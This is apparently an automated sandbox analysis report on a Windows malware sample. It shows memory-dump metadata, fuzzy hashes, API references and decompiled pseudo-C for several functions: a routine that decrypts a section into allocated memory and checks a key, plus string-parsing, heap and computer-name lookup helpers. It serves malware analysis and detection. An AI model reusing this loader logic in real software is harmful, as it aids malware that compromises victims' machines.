                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: a596dd83ce3928f53bcf22750e12f90a1cc46600f3a01ac6ab160da1ad95f794
                                                                                                                                  • Instruction ID: a5d47629f041bd40d9d3e3fac564f9e498addf286394a3aa6e85f308c36820a9
                                                                                                                                  • Opcode Fuzzy Hash: a596dd83ce3928f53bcf22750e12f90a1cc46600f3a01ac6ab160da1ad95f794
                                                                                                                                  • Instruction Fuzzy Hash: C8311B72910249EFCB06DFD8D8C49EE7BB9FF48344B21882AF90A97250E7759941CB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E004014AD(void* __edi, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				unsigned int _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				void* _v40;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				void* _t84;
                                                                                                                                  
                                                                                                                                  				_t83 =  *0x4030f0;
                                                                                                                                  				_t46 = E00401B54(_t83,  &_v24,  &_v16);
                                                                                                                                  				_v20 = _t46;
                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                  					asm("sbb ebx, ebx");
                                                                                                                                  					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                                  					_t84 = _t83 + _v24;
                                                                                                                                  					_v40 = _t84;
                                                                                                                                  					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                                                                                                  					_v28 = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						_v20 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                                                  						if(_t66 <= 0) {
                                                                                                                                  							_t54 =  *0x403100;
                                                                                                                                  						} else {
                                                                                                                                  							_t68 = _a4;
                                                                                                                                  							_t57 = _t53 - _t84;
                                                                                                                                  							_t13 = _t68 + 0x4041a7; // 0x4041a7
                                                                                                                                  							_v32 = _t57;
                                                                                                                                  							_v36 = _t57 + _t13;
                                                                                                                                  							_v12 = _t84;
                                                                                                                                  							while(1) {
                                                                                                                                  								asm("movsd");
                                                                                                                                  								asm("movsd");
                                                                                                                                  								asm("movsd");
                                                                                                                                  								E00401B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                                                                                                  								_v12 = _v12 + 0x1000;
                                                                                                                                  								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  								 *0x403100 = _t54;
                                                                                                                                  								if(_v8 >= _t66) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t57 = _v32;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t54 != 0x69b25f44) {
                                                                                                                                  							_v20 = 9;
                                                                                                                                  						} else {
                                                                                                                                  							memcpy(_v40, _v28, _v16);
                                                                                                                                  						}
                                                                                                                                  						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v20;
                                                                                                                                  			}























                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00401A1F,00000000), ref: 00401503
                                                                                                                                  • memcpy.NTDLL(?,00401A1F,?,?,?,?,?,?,?,00401A1F,00000000,00000030,?,00000000), ref: 0040159E
                                                                                                                                  • VirtualFree.KERNELBASE(00401A1F,00000000,00008000,?,?,?,?,?,?,00401A1F,00000000), ref: 004015B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocFreememcpy
                                                                                                                                  • String ID: Sep 21 2021
                                                                                                                                  • API String ID: 4010158826-1195158264
                                                                                                                                  • Opcode ID: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
                                                                                                                                  • Instruction ID: fec1488cb982f4c8a1e82a672e9de5c8239e5989683b6aa0ff19b00d826874a3
                                                                                                                                  • Opcode Fuzzy Hash: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
                                                                                                                                  • Instruction Fuzzy Hash: 2C311071D00219EFDB01DF94DD85BEEB7B8BF48304F10416AE905BB291D775AA05CB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B5B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t16;
                                                                                                                                  				short _t19;
                                                                                                                                  				void* _t22;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t25;
                                                                                                                                  				short* _t26;
                                                                                                                                  
                                                                                                                                  				_t24 = __edx;
                                                                                                                                  				_t25 = E022B7B3B(_t11, _a12);
                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                  					_t22 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t26 = _t25 + _a16 * 2;
                                                                                                                                  					 *_t26 = 0; // executed
                                                                                                                                  					_t16 = E022B2D2E(__ecx, _a4, _a8, _t25); // executed
                                                                                                                                  					_t22 = _t16;
                                                                                                                                  					if(_t22 == 0) {
                                                                                                                                  						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  						_t19 = 0x5f;
                                                                                                                                  						 *_t26 = _t19;
                                                                                                                                  						_t22 = E022BA38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x22bd238, 0, _t25);
                                                                                                                                  				}
                                                                                                                                  				return _t22;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
                                                                                                                                    • Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
                                                                                                                                    • Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0477935C), ref: 022B5B3D
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0477935C), ref: 022B5B6B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1500278894-8415677
                                                                                                                                  • Opcode ID: 42f7f98c4c1b7a18e3679389a9a17b43b8a7b00e68a78e1849cdabd1af2098c2
                                                                                                                                  • Instruction ID: 02a7417ea6e55e93871543ce08514b00c024bcfcf8d2e65145610b163f540ec6
                                                                                                                                  • Opcode Fuzzy Hash: 42f7f98c4c1b7a18e3679389a9a17b43b8a7b00e68a78e1849cdabd1af2098c2
                                                                                                                                  • Instruction Fuzzy Hash: 4301843262020ABBDB235FE4DC44FDB7B79EF84794F40442AFA409A168D7B1D965CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                  			E022B4A2A(char* _a4, char** _a8) {
                                                                                                                                  				char* _t7;
                                                                                                                                  				char* _t11;
                                                                                                                                  				char* _t14;
                                                                                                                                  				char* _t16;
                                                                                                                                  				char* _t17;
                                                                                                                                  				char _t18;
                                                                                                                                  				signed int _t20;
                                                                                                                                  				signed int _t22;
                                                                                                                                  
                                                                                                                                  				_t16 = _a4;
                                                                                                                                  				_push(0x20);
                                                                                                                                  				_t20 = 1;
                                                                                                                                  				_push(_t16);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t7 = StrChrA();
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t20 = _t20 + 1;
                                                                                                                                  					_push(0x20);
                                                                                                                                  					_push( &(_t7[1]));
                                                                                                                                  				}
                                                                                                                                  				_t11 = E022B1525(_t20 << 2);
                                                                                                                                  				_a4 = _t11;
                                                                                                                                  				if(_t11 != 0) {
                                                                                                                                  					StrTrimA(_t16, 0x22bc284); // executed
                                                                                                                                  					_t22 = 0;
                                                                                                                                  					do {
                                                                                                                                  						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                  							 *_t14 = 0;
                                                                                                                                  							do {
                                                                                                                                  								_t14 =  &(_t14[1]);
                                                                                                                                  								_t18 =  *_t14;
                                                                                                                                  							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                  						}
                                                                                                                                  						_t17 = _a4;
                                                                                                                                  						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                  						_t22 = _t22 + 1;
                                                                                                                                  						_t16 = _t14;
                                                                                                                                  					} while (_t14 != 0);
                                                                                                                                  					 *_a8 = _t17;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,047795AC,022B30F3,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A46
                                                                                                                                  • StrTrimA.SHLWAPI(?,022BC284,00000002,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A64
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Trim
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3043112668-0
                                                                                                                                  • Opcode ID: b72278887cc321003cd9814beb78d902f13e55109657851c554564561b5ab74e
                                                                                                                                  • Instruction ID: 883ea876f453abc3abe531e9589962ca7ec1fe5d34c630812fac4d6f5890470e
                                                                                                                                  • Opcode Fuzzy Hash: b72278887cc321003cd9814beb78d902f13e55109657851c554564561b5ab74e
                                                                                                                                  • Instruction Fuzzy Hash: 450192712203076FE7126AAA8CB8FA77B9DEF86784F444011A945CB246D674D801C764
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Qa
                                                                                                                                  • API String ID: 0-3901847582
                                                                                                                                  • Opcode ID: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
                                                                                                                                  • Instruction ID: b47e7f75465d59820186dd365715d03efea98188db4c6ed069c325c791d01869
                                                                                                                                  • Opcode Fuzzy Hash: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
                                                                                                                                  • Instruction Fuzzy Hash: C4011AB2500109EBDB16DF55D454BEB73B6AB48304F10845AFC06A7240D73DDE91CF99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B8B22(void* _a4) {
                                                                                                                                  				char _t2;
                                                                                                                                  
                                                                                                                                  				_t2 = RtlFreeHeap( *0x22bd238, 0, _a4); // executed
                                                                                                                                  				return _t2;
                                                                                                                                  			}




                                                                                                                                  0x022b8b2e
                                                                                                                                  0x022b8b34

                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: ea008cb4724469d2bd6a3a02824cb84c8fc83e63d43d9e13467aa632facfdab9
                                                                                                                                  • Instruction ID: 5db5d9d7867151c13b5d5f33990638dbe8ea954f1aff2aae9fa696fe9d12c84c
                                                                                                                                  • Opcode Fuzzy Hash: ea008cb4724469d2bd6a3a02824cb84c8fc83e63d43d9e13467aa632facfdab9
                                                                                                                                  • Instruction Fuzzy Hash: 16B01271D80100AFCA134BC0FE0CF05FA21AB50700F008C11B3040407083714470FB15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                  			E022B76E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __esi;
                                                                                                                                  				intOrPtr* _t35;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                  				void* _t54;
                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                  				intOrPtr* _t61;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  
                                                                                                                                  				_t55 = _a4;
                                                                                                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                  				if(_t76 < 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t76;
                                                                                                                                  				}
                                                                                                                                  				_t40 = E022B8A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                  				_t76 = _t40;
                                                                                                                                  				if(_t76 >= 0) {
                                                                                                                                  					_t61 = _a28;
                                                                                                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                  						_t52 = _v8;
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                  					}
                                                                                                                                  					if(_t76 >= 0) {
                                                                                                                                  						_t43 =  *_t55;
                                                                                                                                  						_t68 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t20 = _t68 + 0x22be1fc; // 0x740053
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                  						if(_t76 >= 0) {
                                                                                                                                  							_t76 = E022BA6BC(_a4);
                                                                                                                                  							if(_t76 >= 0) {
                                                                                                                                  								_t65 = _a28;
                                                                                                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                  									_t50 = _a4;
                                                                                                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t45 = _a4;
                                                                                                                                  						if(_t45 != 0) {
                                                                                                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                  						}
                                                                                                                                  						_t57 = __imp__#6;
                                                                                                                                  						if(_a20 != 0) {
                                                                                                                                  							 *_t57(_a20);
                                                                                                                                  						}
                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                  							 *_t57(_a12);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v8;
                                                                                                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                  				goto L18;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B8A19: SysAllocString.OLEAUT32(80000002), ref: 022B8A76
                                                                                                                                    • Part of subcall function 022B8A19: SysFreeString.OLEAUT32(00000000), ref: 022B8ADC
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 022B77C6
                                                                                                                                  • SysFreeString.OLEAUT32(022B4BD8), ref: 022B77D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: 9ec03a6abca7d476e5ef07b105b5fda2f9ec0ee5d9e622b1ac387284422d90a0
                                                                                                                                  • Instruction ID: 0ec6c56ca85baefff9207b45ff410708b769ffc4a8ed5c98a8605ce7d6333b59
                                                                                                                                  • Opcode Fuzzy Hash: 9ec03a6abca7d476e5ef07b105b5fda2f9ec0ee5d9e622b1ac387284422d90a0
                                                                                                                                  • Instruction Fuzzy Hash: 94314876910219AFCB12DFA4C888CDBBB7AFFC97847144658F8159B224E331DD51DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004013C4() {
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void _v32;
                                                                                                                                  				void* _v36;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				void* _t16;
                                                                                                                                  				long _t25;
                                                                                                                                  				int _t26;
                                                                                                                                  				void* _t30;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  				signed int _t36;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  
                                                                                                                                  				_t15 =  *0x403104;
                                                                                                                                  				if( *0x4030ec > 5) {
                                                                                                                                  					_t16 = _t15 + 0x4040f9;
                                                                                                                                  				} else {
                                                                                                                                  					_t16 = _t15 + 0x4040b1;
                                                                                                                                  				}
                                                                                                                                  				E0040136F(_t16, _t16);
                                                                                                                                  				_t36 = 6;
                                                                                                                                  				memset( &_v32, 0, _t36 << 2);
                                                                                                                                  				if(E00401862( &_v32,  &_v16,  *0x403100 ^ 0xf7a71548) == 0) {
                                                                                                                                  					_t25 = 0xb;
                                                                                                                                  				} else {
                                                                                                                                  					_t26 = lstrlenW( *0x4030f8);
                                                                                                                                  					_t8 = _t26 + 2; // 0x2
                                                                                                                                  					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                  					_t30 = E00401E22(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						_t32 = _v36;
                                                                                                                                  						 *_t32 = 0;
                                                                                                                                  						if( *0x4030f8 == 0) {
                                                                                                                                  							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							E00401EF4(_t44, _t32 + 4);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t25 = E00401D7E(_v28); // executed
                                                                                                                                  				}
                                                                                                                                  				ExitThread(_t25);
                                                                                                                                  			}
















                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitThreadlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2636182767-0
                                                                                                                                  • Opcode ID: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
                                                                                                                                  • Instruction ID: 81bba9c2c985b02d9343bb148b21bee0e14b39adfd693302f6ca951fdd028e92
                                                                                                                                  • Opcode Fuzzy Hash: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
                                                                                                                                  • Instruction Fuzzy Hash: 4811AC72104201AAE711DB65CD49E9B77ECAB44308F00883AB505F71F0EB34EA058B5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B5D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                  				void* _t21;
                                                                                                                                  				void* _t22;
                                                                                                                                  				signed int _t24;
                                                                                                                                  				intOrPtr* _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  
                                                                                                                                  				_t26 = __edi;
                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t27 = E022B7DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                  					if(_t27 == 0) {
                                                                                                                                  						_t24 = _a12 >> 1;
                                                                                                                                  						if(_t24 == 0) {
                                                                                                                                  							_t27 = 2;
                                                                                                                                  							HeapFree( *0x22bd238, 0, _a4);
                                                                                                                                  						} else {
                                                                                                                                  							_t21 = _a4;
                                                                                                                                  							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                  							 *_t26 = _t21;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L6:
                                                                                                                                  					return _t27;
                                                                                                                                  				}
                                                                                                                                  				_t22 = E022B1037(_a4, _a8, _a12, __edi); // executed
                                                                                                                                  				_t27 = _t22;
                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B1037: SysFreeString.OLEAUT32(00000000), ref: 022B109A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,022B5356,?,004F0053,04779368,00000000,?), ref: 022B5DDC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$HeapString
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3806048269-8415677
                                                                                                                                  • Opcode ID: 28368f2e8179b465c35f4ea717253dfe9dbe7ac7ea250b415d397a2fc5d8fecd
                                                                                                                                  • Instruction ID: 7ced5a389540832ae92d9dbb290ebb633b529adb894d5abc9e9fb3a62342d7cf
                                                                                                                                  • Opcode Fuzzy Hash: 28368f2e8179b465c35f4ea717253dfe9dbe7ac7ea250b415d397a2fc5d8fecd
                                                                                                                                  • Instruction Fuzzy Hash: 8E01283251061ABBCF239E94DC08FEA7B65EF08790F448529FE099E124D731C970DB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E022B831C(void* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _t15;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t20;
                                                                                                                                  				void* _t22;
                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                  
                                                                                                                                  				_t23 = __imp__;
                                                                                                                                  				_t20 = 0;
                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                  				_t10 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					_t20 = E022B1525(_t10 + 1);
                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                  						if(_t15 != 0) {
                                                                                                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							E022B8B22(_t20);
                                                                                                                                  							_t20 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t20;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,022B9C7E,74E5F710,00000000,?,?,022B9C7E), ref: 022B8334
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,022B9C7E,022B9C7F,?,?,022B9C7E), ref: 022B8351
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ComputerHeapName$AllocateFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187446995-0
                                                                                                                                  • Opcode ID: 577a568ac3d33652f4377d3d5eddd80acccd331f21986d2152615192a53e57d0
                                                                                                                                  • Instruction ID: 2622c5fe59eb1a3028f830e756ba79c584e0ffd382476c38d77dc87e44d74dac
